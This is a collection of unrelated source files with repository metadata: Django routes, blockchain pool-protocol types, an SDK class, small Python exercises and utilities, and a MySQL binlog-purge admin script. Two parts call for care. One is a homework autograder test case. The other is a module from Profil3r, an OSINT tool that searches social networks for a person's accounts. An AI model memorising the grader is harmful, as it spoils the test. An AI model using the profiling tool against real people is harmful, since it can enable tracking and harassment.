9c5539d8a3f55ac77c8088a89e80ba26627d0880 | 4751fd86184b64316d694a98671d34faae76ffe6 | /plannerrr/urls.py | 5440d164eca08d316b10eec4f88ad184fb5b72d6 | [] | no_license | mohammedaliyu136/dg_planner | 8a6a4888cc109d6c3a1cb115494a1e6decbb864a | a0fb87e182527e541e7758a2c4720ddbb2438145 | refs/heads/master | 2020-04-03T08:09:02.020426 | 2018-10-29T19:57:16 | 2018-10-29T19:57:16 | 155,124,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,225 | py | from plannerrr import views
from django.conf.urls import include, url
from django.contrib import admin
from plannerrr.advisor.views import edit_default_plan
urlpatterns = [
    url(r'^$', views.index, name='index'),
    url(r'^login/', views.login_user, name='login'),
    # NOTE(review): name='login' is reused below, and 'profile' and 'team'
    # are each used twice as well -- Django's reverse() only resolves the
    # last registration of a duplicated name. Confirm and rename.
    url(r'^login_out/', views.logout_user, name='login'),
    url(r'^profile/', views.profile, name='profile'),
    url(r'^register/', views.register, name='register'),
    url(r'^enroll_profile/', views.enroll_profile, name='profile'),
    url(r'^indexx/', views.indexx, name='get_info'),
    url(r'^degree_req/', views.degree_req, name='free_elective_req'),
    url(r'^my_view/', views.my_view, name='my_view'),
    url(r'^show_schedule/', views.show_schedule, name='planner'),
    url(r'^search/', views.search, name='search'),
    url(r'^student/(?P<pk>\d+)$', views.search_click, name='student'),
    url(r'^students/$', views.search, name='students'),
    url(r'^team/$', views.team, name='team'),
    url(r'^plan/edit/$', views.edit_plan, name='team'),
    url(r'^plan/generated/pdf/$', views.generate_pdf, name='pdf'),
    url(r'^dashboard/', views.dashboard, name='dashboard'),
    url(r'^getcourse/', views.get_course, name='get_course'),
]
| [
"mohammedaliyu136@gmail.com"
] | mohammedaliyu136@gmail.com |
a7116d737ea16e7b0521b8c9990f276ce7f27c42 | d0bdf444c71b724ecfd59b5bc6850962c56494cb | /homeworks/02-arrays_tables/tests/q2_2.py | b338149a2d1c1e8bf6590df93b420ef2042ceb53 | [] | no_license | ucsd-ets/dsc10-su20-public | 10e3d0ff452b337f222baee330fe60d1465b0071 | 38787e6cc3e6210b4cc8a46350e5120845971c9f | refs/heads/master | 2022-12-13T23:28:20.512649 | 2020-09-03T19:28:06 | 2020-09-03T19:28:06 | 275,905,339 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | test = {
    # OK-format autograder config: a single doctest case checking that
    # `new_allowances_constant` is a numpy ndarray.
    'name': 'Question 2_2',
    'hidden': False,
    'points': 1,
    'suites': [
        {
            'cases': [
                {
                    'code': r"""
                    >>> isinstance( new_allowances_constant , np.ndarray)
                    True
                    """,
                    'hidden': False,
                    'locked': False
                }
            ],
            'scored': True,
            'setup': '',
            'teardown': '',
            'type': 'doctest'
        }
    ]
}
| [
"eldridgejm@gmail.com"
] | eldridgejm@gmail.com |
3c2ffe9176682d22fb8791c366db0d1b969071f8 | f7deae8209a3ff66050780d5e59c8f2231f8139f | /profil3r/app/core/services/_social.py | a5abb6c74a823594b669110e37afced5602f1873 | [
"MIT"
] | permissive | cyber-workforce/Profil3r | 858b6ce3ad71bb4cf5d621a6bd18023d50538968 | ec308924850e0514416aaeaa9e96eabf658e2d0e | refs/heads/main | 2023-06-17T04:07:57.303282 | 2021-07-12T12:51:03 | 2021-07-12T12:51:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,041 | py | from profil3r.app.modules.social.facebook import Facebook
from profil3r.app.modules.social.twitter import Twitter
from profil3r.app.modules.social.tiktok import TikTok
from profil3r.app.modules.social.instagram import Instagram
from profil3r.app.modules.social.pinterest import Pinterest
from profil3r.app.modules.social.linktree import LinkTree
from profil3r.app.modules.social.myspace import MySpace
from profil3r.app.modules.social.flickr import Flickr
from profil3r.app.modules.social.goodread import GoodRead
# NOTE(review): these module-level functions all take `self` -- presumably
# they are attached to a core service class elsewhere that provides
# self.result, self.config, self.permutations_list and self.print_results.
# Confirm before refactoring. Each helper follows the same pattern: run the
# module's permutation search, store the hits under its key, print them.

# Facebook
def facebook(self):
    self.result["facebook"] = Facebook(self.config, self.permutations_list).search()
    # print results
    self.print_results("facebook")

# Twitter
def twitter(self):
    self.result["twitter"] = Twitter(self.config, self.permutations_list).search()
    # print results
    self.print_results("twitter")

# TikTok
def tiktok(self):
    self.result["tiktok"] = TikTok(self.config, self.permutations_list).search()
    # print results
    self.print_results("tiktok")

# Instagram
def instagram(self):
    self.result["instagram"] = Instagram(self.config, self.permutations_list).search()
    # print results
    self.print_results("instagram")

# Pinterest
def pinterest(self):
    self.result["pinterest"] = Pinterest(self.config, self.permutations_list).search()
    # print results
    self.print_results("pinterest")

# LinkTree
def linktree(self):
    self.result["linktree"] = LinkTree(self.config, self.permutations_list).search()
    # print results
    self.print_results("linktree")

# MySpace
def myspace(self):
    self.result["myspace"] = MySpace(self.config, self.permutations_list).search()
    # print results
    self.print_results("myspace")

# Flickr
def flickr(self):
    self.result["flickr"] = Flickr(self.config, self.permutations_list).search()
    # print results
    self.print_results("flickr")

# GoodRead
def goodread(self):
    self.result["goodread"] = GoodRead(self.config, self.permutations_list).search()
    # print results
    self.print_results("goodread")
"r0g3r5@protonmail.com"
] | r0g3r5@protonmail.com |
91b6bd20ba16539afdb282384848c0db31a11601 | 111cac4319ff247d890926ddda4809a7ca6e6f25 | /ch02/02.py | edc962b02e51c769360fa1e35669d95871ace916 | [] | no_license | gebijiaxiaowang/FluentPython | c5c9838209524cbab0036f22ef6b75085b8ead53 | 700427ee872cd4c2a4b6466f7a214b7acc679580 | refs/heads/master | 2023-03-02T21:20:06.224311 | 2021-02-09T08:58:42 | 2021-02-09T08:58:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,162 | py | #!/usr/bin/python3.7
# -*- coding: utf-8 -*-
# @Time : 2020/12/31 15:25
# @Author : dly
# @File : 02.py
# @Desc :
import os
from collections import namedtuple
lax_coordinates = (33.9, -118.4)
# Tuple unpacking
latitude, longitude = lax_coordinates
print(latitude)
print(longitude)
# divmod(x, y)
# Return the tuple (x//y, x%y).
print(divmod(20, 8))
# Splitting a path into (directory, file name)
print(os.path.split('/home/python/test.py'))
# ('/home/python', 'test.py')
# Use * to capture the remaining elements
a, b, *c = range(5)
print(a, b, c)
# Named tuples
City = namedtuple('City', 'name country population coordinates')
# Field names
print(City._fields)
tokyo = City('Tokyo', 'JP', 36.9, (35.6, 239.6))
print(tokyo)
print(tokyo.population)
print(tokyo.coordinates)
# Convert to a dict
print(tokyo._asdict())
# Slice assignment
l = list(range(10))
print(l)
l[2:5] = [20, 30]
print(l)
l[2:5] = [100]
print(l)
# Using + and * on sequences
board = [['_'] * 3 for i in range(3)]
print(board)
board[1][2] = 'x'
print(board)
# Three references to the *same* inner list object
board = [['_'] * 3] * 3
print(board)
board[1][2] = '0'  # changes every row, since all three share one list
print(board)
# +=
# Famous corner case: t[2] is extended in place AND the tuple item
# assignment raises TypeError, so the final print(t) never runs.
t = (1, 2, [30, 40])
t[2] += [50, 60]
print(t)
| [
"1083404373@qq.com"
] | 1083404373@qq.com |
ff4a5fc06618705dfc56f7d5407354cef5cb04bd | d943d1b6803bb3c44b3600a2b3728662d4a3de06 | /btcgreen/protocols/pool_protocol.py | 8156b5f25f7f6e48ecf3d376e3bbe60cd68eaabe | [
"Apache-2.0"
] | permissive | onuratakan/btcgreen-blockchain | 624575e3f484dcbb70dbbbfab46f7eeb92a5b709 | 03c9e27c483a0c3e6a34713dd9d2502eff7c25b2 | refs/heads/main | 2023-09-06T04:31:12.725344 | 2021-10-16T23:45:51 | 2021-10-16T23:45:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,027 | py | from dataclasses import dataclass
from enum import Enum
import time
from typing import Optional
from blspy import G1Element, G2Element
from btcgreen.types.blockchain_format.proof_of_space import ProofOfSpace
from btcgreen.types.blockchain_format.sized_bytes import bytes32
from btcgreen.util.ints import uint8, uint16, uint32, uint64
from btcgreen.util.streamable import Streamable, streamable
POOL_PROTOCOL_VERSION = uint8(1)
class PoolErrorCode(Enum):
    """Numeric error codes carried in ErrorResponse.error_code."""
    REVERTED_SIGNAGE_POINT = 1
    TOO_LATE = 2
    NOT_FOUND = 3
    INVALID_PROOF = 4
    PROOF_NOT_GOOD_ENOUGH = 5
    INVALID_DIFFICULTY = 6
    INVALID_SIGNATURE = 7
    SERVER_EXCEPTION = 8
    INVALID_P2_SINGLETON_PUZZLE_HASH = 9
    FARMER_NOT_KNOWN = 10
    FARMER_ALREADY_KNOWN = 11
    INVALID_AUTHENTICATION_TOKEN = 12
    INVALID_PAYOUT_INSTRUCTIONS = 13
    INVALID_SINGLETON = 14
    DELAY_TIME_TOO_SHORT = 15
    REQUEST_FAILED = 16
# Wire-format dataclasses. NOTE(review): @streamable presumably derives the
# (de)serialization from the declared field order -- confirm in
# util.streamable before reordering any field.

# Used to verify GET /farmer and GET /login
@dataclass(frozen=True)
@streamable
class AuthenticationPayload(Streamable):
    method_name: str
    launcher_id: bytes32
    target_puzzle_hash: bytes32
    authentication_token: uint64


# GET /pool_info
@dataclass(frozen=True)
@streamable
class GetPoolInfoResponse(Streamable):
    name: str
    logo_url: str
    minimum_difficulty: uint64
    relative_lock_height: uint32
    protocol_version: uint8
    fee: str
    description: str
    target_puzzle_hash: bytes32
    authentication_token_timeout: uint8


# POST /partial
@dataclass(frozen=True)
@streamable
class PostPartialPayload(Streamable):
    launcher_id: bytes32
    authentication_token: uint64
    proof_of_space: ProofOfSpace
    sp_hash: bytes32
    end_of_sub_slot: bool
    harvester_id: bytes32


@dataclass(frozen=True)
@streamable
class PostPartialRequest(Streamable):
    payload: PostPartialPayload
    aggregate_signature: G2Element


# Response in success case
@dataclass(frozen=True)
@streamable
class PostPartialResponse(Streamable):
    new_difficulty: uint64


# GET /farmer
# Response in success case
@dataclass(frozen=True)
@streamable
class GetFarmerResponse(Streamable):
    authentication_public_key: G1Element
    payout_instructions: str
    current_difficulty: uint64
    current_points: uint64
# POST /farmer
@dataclass(frozen=True)
@streamable
class PostFarmerPayload(Streamable):
    launcher_id: bytes32
    authentication_token: uint64
    authentication_public_key: G1Element
    payout_instructions: str
    suggested_difficulty: Optional[uint64]


@dataclass(frozen=True)
@streamable
class PostFarmerRequest(Streamable):
    payload: PostFarmerPayload
    signature: G2Element


# Response in success case
@dataclass(frozen=True)
@streamable
class PostFarmerResponse(Streamable):
    welcome_message: str


# PUT /farmer
@dataclass(frozen=True)
@streamable
class PutFarmerPayload(Streamable):
    launcher_id: bytes32
    authentication_token: uint64
    authentication_public_key: Optional[G1Element]
    payout_instructions: Optional[str]
    suggested_difficulty: Optional[uint64]


@dataclass(frozen=True)
@streamable
class PutFarmerRequest(Streamable):
    payload: PutFarmerPayload
    signature: G2Element


# Response in success case
@dataclass(frozen=True)
@streamable
class PutFarmerResponse(Streamable):
    # NOTE(review): presumably each flag reports whether the matching
    # PutFarmerPayload field was applied -- confirm against the pool spec.
    authentication_public_key: Optional[bool]
    payout_instructions: Optional[bool]
    suggested_difficulty: Optional[bool]


# Misc
# Response in error case for all endpoints of the pool protocol
@dataclass(frozen=True)
@streamable
class ErrorResponse(Streamable):
    error_code: uint16
    error_message: Optional[str]
# Get the current authentication token according to "Farmer authentication" in SPECIFICATION.md
def get_current_authentication_token(timeout: uint8) -> uint64:
    # Token increments once every `timeout` minutes of Unix time.
    return uint64(int(int(time.time() / 60) / timeout))


# Validate a given authentication token against our local time
def validate_authentication_token(token: uint64, timeout: uint8) -> bool:
    # Accept tokens within +/- `timeout` steps of ours (clock-skew tolerance).
    return abs(token - get_current_authentication_token(timeout)) <= timeout
| [
"svginsomnia@gmail.com"
] | svginsomnia@gmail.com |
3e95aaa34291786d7b1e43802787d3b150378db0 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/response/AlipayCommerceEducateTuitioncodePlanDisburseResponse.py | b68b5df3dd899650dcb85ee7430d2c745ecd58df | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 497 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayCommerceEducateTuitioncodePlanDisburseResponse(AlipayResponse):
def __init__(self):
super(AlipayCommerceEducateTuitioncodePlanDisburseResponse, self).__init__()
def parse_response_content(self, response_content):
response = super(AlipayCommerceEducateTuitioncodePlanDisburseResponse, self).parse_response_content(response_content)
| [
"jiandong.jd@antfin.com"
] | jiandong.jd@antfin.com |
0189a50f15557b57e5dd47c6ad38deada72bbd5f | 08e6b46769aa36da479f29ef345bdb15e5d0d102 | /admin_mysql_purge_binlog.py | 3cd6ca5344c7563aad947373aba1ea153792b032 | [] | no_license | speedocjx/lepus_python | 30a33852efdef5b24402cbe81b8d9798072f9309 | 27d61c154d4cde97e004e3851203420f77a63c5d | refs/heads/master | 2021-06-14T22:37:50.936419 | 2017-03-21T06:18:12 | 2017-03-21T06:18:12 | 70,157,618 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,114 | py | #!//bin/env python
#coding:utf-8
import os
import sys
import string
import time
import datetime
import MySQLdb
path='.\include'
sys.path.insert(0,path)
import functions as func
from multiprocessing import Process;
def admin_mysql_purge_binlog(host,port,user,passwd,binlog_store_days):
datalist=[]
try:
connect=MySQLdb.connect(host=host,user=user,passwd=passwd,port=int(port),connect_timeout=2,charset='utf8')
cur=connect.cursor()
connect.select_db('information_schema')
master_thread=cur.execute("select * from information_schema.processlist where COMMAND = 'Binlog Dump';")
datalist=[]
if master_thread >= 1:
now=datetime.datetime.now()
delta=datetime.timedelta(days=binlog_store_days)
n_days=now-delta
before_n_days= n_days.strftime('%Y-%m-%d %H:%M:%S')
cur.execute("purge binary logs before '%s'" %(before_n_days));
print ("mysql %s:%s binlog been purge" %(host,port) )
except MySQLdb.Error,e:
pass
print "Mysql Error %d: %s" %(e.args[0],e.args[1])
def main():
    """Spawn one purge worker process per monitored MySQL server, then reap them.

    Server rows come from the db_servers_mysql inventory table; only rows
    with monitor=1, binlog_auto_purge=1 and is_delete=0 participate.
    """
    user = func.get_config('mysql_db', 'username')
    passwd = func.get_config('mysql_db', 'password')
    servers = func.mysql_query("select host,port,binlog_store_days from db_servers_mysql where is_delete=0 and monitor=1 and binlog_auto_purge=1;")
    if servers:
        print("%s: admin mysql purge binlog controller started." % (time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()),))
        plist = []
        for row in servers:
            host = row[0]
            port = row[1]
            binlog_store_days = row[2]
            p = Process(target=admin_mysql_purge_binlog, args=(host, port, user, passwd, binlog_store_days))
            plist.append(p)
        for p in plist:
            p.start()
        # Fixed 60-second budget for all workers, then hard-kill stragglers
        # before joining them.
        time.sleep(60)
        for p in plist:
            p.terminate()
        for p in plist:
            p.join()
        print("%s: admin mysql purge binlog controller finished." % (time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()),))
if __name__=='__main__':
main()
| [
"changjingxiu1@163.com"
] | changjingxiu1@163.com |
76428ce31dbddb8a14d11a3a0fa372bea28b6157 | 9b422078f4ae22fe16610f2ebc54b8c7d905ccad | /xlsxwriter/test/comparison/test_chart_doughnut01.py | 7048957c7e5110ea5f6179445573456bacf51b58 | [
"BSD-2-Clause-Views"
] | permissive | projectsmahendra/XlsxWriter | 73d8c73ea648a911deea63cb46b9069fb4116b60 | 9b9d6fb283c89af8b6c89ad20f72b8208c2aeb45 | refs/heads/master | 2023-07-21T19:40:41.103336 | 2023-07-08T16:54:37 | 2023-07-08T16:54:37 | 353,636,960 | 0 | 0 | NOASSERTION | 2021-04-01T08:57:21 | 2021-04-01T08:57:20 | null | UTF-8 | Python | false | false | 1,121 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
    """Compare an XlsxWriter-generated workbook against a file created by Excel."""

    def setUp(self):
        self.set_filename('chart_doughnut01.xlsx')

    def test_create_file(self):
        """Build a simple doughnut-chart workbook and compare it to the reference."""
        workbook = Workbook(self.got_filename)
        worksheet = workbook.add_worksheet()
        chart = workbook.add_chart({'type': 'doughnut'})

        categories = [2, 4, 6]
        values = [60, 30, 10]
        worksheet.write_column('A1', categories)
        worksheet.write_column('B1', values)

        chart.add_series({
            'categories': '=Sheet1!$A$1:$A$3',
            'values': '=Sheet1!$B$1:$B$3',
        })

        worksheet.insert_chart('E9', chart)
        workbook.close()

        self.assertExcelEqual()
| [
"jmcnamara@cpan.org"
] | jmcnamara@cpan.org |
ad358bf4d32aea80191fa3241fe832f390353029 | 41311e8bbed80e1f819157d24d7943c05ba6b2e6 | /ProblemSet1/loadWords/loadWords.py | 3a94e083edcd22587507bf4aeaa2b961c0adee1b | [] | no_license | tanglan2009/MITx6.00.2x_Introductin_Computational_Thinking_and_Data_Science | c0bb39cb0964014661823e1301f05af7837ff3c5 | 334726fca7f87eae55f5f45c3cdc4dbac02cfac4 | refs/heads/master | 2021-01-10T02:49:34.663406 | 2016-03-06T19:49:44 | 2016-03-06T19:49:44 | 53,272,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 767 | py | import string
PATH_TO_FILE = 'words.txt'
def loadWords():
inFile = open(PATH_TO_FILE, 'r', 0)
line = inFile.readline()
wordlist = string.split(line)
print " ", len(wordlist), "words loaded."
return wordlist
loadWords()
# Uncomment the following function if you want to try the code template
def loadWords2():
    """Template variant of loadWords() with a built-in fallback list.

    NOTE: intentionally incomplete teaching scaffolding -- the marked line
    inside the try block is for the student to fill in. If the file cannot
    be opened, a small hard-coded fruit list is returned instead.
    """
    try:
        inFile = open(PATH_TO_FILE, 'r', 0)
        #line of code to be added here#
    except:
        print "The wordlist doesn't exist; using some fruits for now"
        return ['apple', 'orange', 'pear', 'lime', 'lemon', 'grape', 'pineapple']
    line = inFile.readline()
    wordlist = string.split(line)
    print " ", len(wordlist), "words loaded."
    return wordlist
PATH_TO_FILE = 'words2.txt'
loadWords2()
PATH_TO_FILE = 'doesntExist.txt'
loadWords2()
| [
"tanglan2009@gmail.com"
] | tanglan2009@gmail.com |
e728f33e5d0da7256dab52088914b8554fcfb53b | 2fb0af0a30e3133ef4c5e649acd3f9911430062c | /src/otp/level/ZoneEntity.py | dd4b697f834eeffe4a6e4330b73a50fe508dda0f | [] | no_license | Teku16/Toontown-Crystal-Master | 4c01c0515f34a0e133441d2d1e9f9156ac267696 | 77a9345d52caa350ee0b1c7ad2b7461a3d6ed830 | refs/heads/master | 2020-05-20T06:02:58.106504 | 2015-07-25T07:23:59 | 2015-07-25T07:23:59 | 41,053,558 | 0 | 1 | null | 2015-08-19T18:51:11 | 2015-08-19T18:51:11 | null | UTF-8 | Python | false | false | 1,244 | py | import ZoneEntityBase
import BasicEntities
class ZoneEntity(ZoneEntityBase.ZoneEntityBase, BasicEntities.NodePathAttribs):
    """Entity for a single level zone.

    Wraps the zone's node from the level model and keeps, per zone number,
    a reference count of how many sources currently list that zone as
    visible.
    """

    def __init__(self, level, entId):
        ZoneEntityBase.ZoneEntityBase.__init__(self, level, entId)
        self.nodePath = self.level.getZoneNode(self.entId)
        if self.nodePath is None:
            # Fatal: the level model has no node for this zone id.
            self.notify.error('zone %s not found in level model' % self.entId)
        BasicEntities.NodePathAttribs.initNodePathAttribs(self, doReparent=0)
        # Maps zoneNum -> count of references currently held on it.
        self.visibleZoneNums = {}
        # self.visibility is presumably populated by a base class or the
        # attrib init above -- TODO confirm.
        self.incrementRefCounts(self.visibility)

    def destroy(self):
        BasicEntities.NodePathAttribs.destroy(self)
        ZoneEntityBase.ZoneEntityBase.destroy(self)

    def getNodePath(self):
        """Return the zone's node in the level model."""
        return self.nodePath

    def getVisibleZoneNums(self):
        """Return the zone numbers that currently have a nonzero ref count."""
        return self.visibleZoneNums.keys()

    def incrementRefCounts(self, zoneNumList):
        # Add one reference for each listed zone, creating entries on demand.
        for zoneNum in zoneNumList:
            self.visibleZoneNums.setdefault(zoneNum, 0)
            self.visibleZoneNums[zoneNum] += 1

    def decrementRefCounts(self, zoneNumList):
        # NOTE(review): assumes every decrement was balanced by an earlier
        # increment; an unmatched zoneNum raises KeyError.
        for zoneNum in zoneNumList:
            self.visibleZoneNums[zoneNum] -= 1
            if self.visibleZoneNums[zoneNum] == 0:
                del self.visibleZoneNums[zoneNum]
"vincentandrea15k@gmail.com"
] | vincentandrea15k@gmail.com |
cf1f4af51afa41b4dec936aee3e234c05d0c1381 | fbf8bbc67ee98632531bb79b0353b536427d7572 | /variables_and_scope/exe1_function.py | 6687c59c3573e3f5e48fd39f5c3f3b5cafce1c0a | [] | no_license | bartoszmaleta/3rd-Self-instructed-week | c0eea57a8b077d91fe09fe53c1109d3a79e3f37c | 4d00306e64ba2f7c2dd8213fd776ce8d3da142fc | refs/heads/master | 2020-08-20T22:31:17.675733 | 2019-10-28T12:24:22 | 2019-10-28T12:24:22 | 216,073,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py | def my_funcion(a):
b = a - 2
# print(b)
return b
c = 1
if c > 2:
d = my_funcion(5)
print(d)
# my_funcion(5)
| [
"bartosz.maleta@gmail.com"
] | bartosz.maleta@gmail.com |
6c365f68c5d1ed3c3e601bb023af3f91a5b78b92 | 14b44aa2b73fb3df08c9c085219ebfd320d5d63a | /register_service/venv/bin/jp.py | be778c22379e6ca2900eb32e774e96139bfddb56 | [] | no_license | sande2jm/CI-CD-Service | c46f95f380872e9aca02d5c5e5a88578ba6e88b0 | 34535e69a3c39a78cd1d1ca785587d5e78a03580 | refs/heads/master | 2020-03-27T02:16:00.843764 | 2018-08-25T00:28:32 | 2018-08-25T00:28:32 | 145,778,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,714 | py | #!/Users/jacob/Desktop/_ML/CI-CD-Service/venv/bin/python3
import sys
import json
import argparse
from pprint import pformat
import jmespath
from jmespath import exceptions
def main():
    """CLI entry point: evaluate a JMESPath expression against JSON input.

    Falls through (implicitly None) on success, which the __main__ guard
    hands to sys.exit as exit status 0; returns 1 after printing a
    categorized message to stderr for any JMESPath error.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('expression')
    parser.add_argument('-f', '--filename',
                        help=('The filename containing the input data. '
                              'If a filename is not given then data is '
                              'read from stdin.'))
    parser.add_argument('--ast', action='store_true',
                        help=('Pretty print the AST, do not search the data.'))
    args = parser.parse_args()
    expression = args.expression
    if args.ast:
        # Only print the AST
        expression = jmespath.compile(args.expression)
        sys.stdout.write(pformat(expression.parsed))
        sys.stdout.write('\n')
        return 0
    if args.filename:
        with open(args.filename, 'r') as f:
            data = json.load(f)
    else:
        # No file given: read the whole of stdin and parse it as JSON.
        data = sys.stdin.read()
        data = json.loads(data)
    try:
        # Pretty-print the search result as 4-space-indented JSON.
        sys.stdout.write(json.dumps(
            jmespath.search(expression, data), indent=4))
        sys.stdout.write('\n')
    except exceptions.ArityError as e:
        sys.stderr.write("invalid-arity: %s\n" % e)
        return 1
    except exceptions.JMESPathTypeError as e:
        sys.stderr.write("invalid-type: %s\n" % e)
        return 1
    except exceptions.UnknownFunctionError as e:
        sys.stderr.write("unknown-function: %s\n" % e)
        return 1
    except exceptions.ParseError as e:
        sys.stderr.write("syntax-error: %s\n" % e)
        return 1
if __name__ == '__main__':
sys.exit(main())
| [
"sande2jm@gmail.com"
] | sande2jm@gmail.com |
08b8127958744b568e48462f5aed02e97b1ddad2 | 62bbef9472f343adea9804e29f403798434455df | /octaveimp/dictgen.py | 3a9e93641d4d9b0d46bbce71a0195c6000186de2 | [] | no_license | drdhaval2785/SamaasaClassification | d46658abce7ea7d7b6c89522ecc22a9d4391c011 | f71be804d2b6fb0ec370d0917adf1a58079df550 | refs/heads/master | 2020-12-24T08:55:08.230647 | 2016-08-07T09:17:39 | 2016-08-07T09:17:39 | 38,927,628 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,408 | py | # -*- coding: utf-8 -*-
import sys, re
import codecs
import string
import datetime
"""
Usage - python dictgen.py step2.csv step3.csv dict.txt class.txt
Creates a dictionary and index of unique words in step2.csv.
The replacements are stored in step3.csv.
dict.txt file has the dictionary.
class.txt file has unique classes.
"""
# Function to return timestamp
def timestamp():
    """Return the current local time as a datetime.datetime object."""
    return datetime.datetime.now()
def readcsv(csvfile):
    """Parse a 3-column CSV of (word, micro, macro) rows into a list of tuples.

    Each line must contain exactly two commas; anything else raises
    ValueError from the tuple unpacking. Fix: the file is now opened via
    `with` so the handle is closed (the original `open()` leaked it).
    """
    output = []
    with open(csvfile) as fin:
        for line in fin:
            word, micro, macro = line.strip().split(',')
            output.append((word, micro, macro))
    return output
def writedict(readcsvdata, dictfile):
    """Write every unique compound part to `dictfile`, one per line (UTF-8).

    Parts are the '-'-separated pieces of each word in `readcsvdata`
    (tuples of (word, micro, macro)). Fixes: output is sorted so the
    generated dictionary is deterministic across runs (bare set() order
    was not), and the file handle is closed via `with`.
    """
    parts = []
    for (word, micro, macro) in readcsvdata:
        parts += word.split('-')
    unique_parts = sorted(set(parts))
    with codecs.open(dictfile, 'w', 'utf-8') as diction:
        diction.write('\n'.join(unique_parts))
def findindex(word, diction):
    """Return the index of `word` among the stripped lines of `diction`.

    Scans the whole list and returns 0 when the word is absent. NOTE:
    0 is also a legitimate hit (first line), so callers cannot tell
    "not found" apart from "found at index 0"; the sentinel is kept for
    backward compatibility. Rewritten with enumerate (no py2-only xrange)
    so the full linear scan is unambiguous.
    """
    for i, line in enumerate(diction):
        if word == line.strip():
            return i
    return 0
def repdict(readcsvdata, step3file, dictfile, classfile):
    """Encode two-part compounds as (index1, index2, classindex) CSV rows.

    Writes three outputs:
      * classfile  - the unique macro classes, one per line
      * step3file  - for each word with exactly two '-'-parts, the dict
        indices of both parts (looked up via findindex) plus the index of
        its macro class
      * log.txt    - appended with every word that does NOT have exactly
        two parts (see the section header written below)
    """
    step3 = codecs.open(step3file, 'w', 'utf-8')
    diction = codecs.open(dictfile, 'r', 'utf-8').readlines()
    log = codecs.open('log.txt', 'a', 'utf-8')
    log.write('==========More than two parts in compound==========\n')
    counter = 0
    classtypes = []
    # First pass: collect and deduplicate the macro classes.
    for (word, micro, macro) in readcsvdata:
        classtypes.append(macro)
    classfout = codecs.open(classfile, 'w', 'utf-8')
    classtypes = list(set(classtypes))
    classfout.write('\n'.join(classtypes))
    classfout.close()
    # Second pass: emit index triples for two-part compounds only.
    for (word, micro, macro) in readcsvdata:
        wordsplit = word.split('-')
        if len(wordsplit) == 2:
            counter += 1
            word1, word2 = word.split('-')
            ind1 = findindex(word1, diction)
            ind2 = findindex(word2, diction)
            classrep = classtypes.index(macro)
            step3.write(str(ind1) + ',' + str(ind2) + ',' + str(classrep) + '\n')
            if counter % 100 == 0:
                print counter  # progress heartbeat (Python 2 print)
        else:
            # Words without exactly two parts are logged for manual review.
            log.write(word + ',' + micro + ',' + macro + '\n')
    log.close()
    step3.close()
if __name__=="__main__":
fin = sys.argv[1]
fout = sys.argv[2]
dictfile = sys.argv[3]
classfile = sys.argv[4]
readcsvdata = readcsv(fin)
print len(readcsvdata), "entries in step2.csv"
writedict(readcsvdata,dictfile)
repdict(readcsvdata,fout,dictfile,classfile)
step3data = codecs.open(fout,'r','utf-8').readlines()
print len(step3data), "entries in step3.csv"
classtypes = codecs.open(classfile,'r','utf-8').readlines()
print len(classtypes), "types of class in data" | [
"drdhaval2785@gmail.com"
] | drdhaval2785@gmail.com |
0052186786f9135544da4bbd4cbbd0182d70d987 | 2c9db62ddaffd77c097b3da4990021270912ea40 | /프로그래머스/42626.py | 0fee2888d34a12c55c57058eb42adda113a2d477 | [] | no_license | nahyun119/algorithm | 9ae120fbe047819a74e06fc6879f55405bc9ea71 | 40e291305a4108266073d489e712787df1dbae4b | refs/heads/master | 2023-08-27T23:18:44.133748 | 2021-10-03T11:32:12 | 2021-10-03T11:32:12 | 326,661,962 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 559 | py | import heapq
def solution(scoville, K):
    """Return the minimum number of mixes until every scoville value >= K.

    One mix removes the two mildest bowls and adds (mildest + 2 * second
    mildest). Returns -1 when the target cannot be reached: fewer than two
    bowls remain while the mildest is still below K, or the input is empty.

    Fixes: builds the heap with heapify (O(n)) instead of n pushes
    (O(n log n)), drops the convoluted `is_done` flag, and leaves the
    caller's list unmodified.
    """
    heap = list(scoville)  # copy so the caller's list is untouched
    heapq.heapify(heap)
    mixes = 0
    while heap and heap[0] < K:
        if len(heap) == 1:  # mildest is too mild and there is nothing to mix it with
            return -1
        mildest = heapq.heappop(heap)
        second = heapq.heappop(heap)
        heapq.heappush(heap, mildest + second * 2)
        mixes += 1
    # Empty input falls through with an empty heap -> -1, matching the original.
    return mixes if heap else -1
"nahyun858@gmail.com"
] | nahyun858@gmail.com |
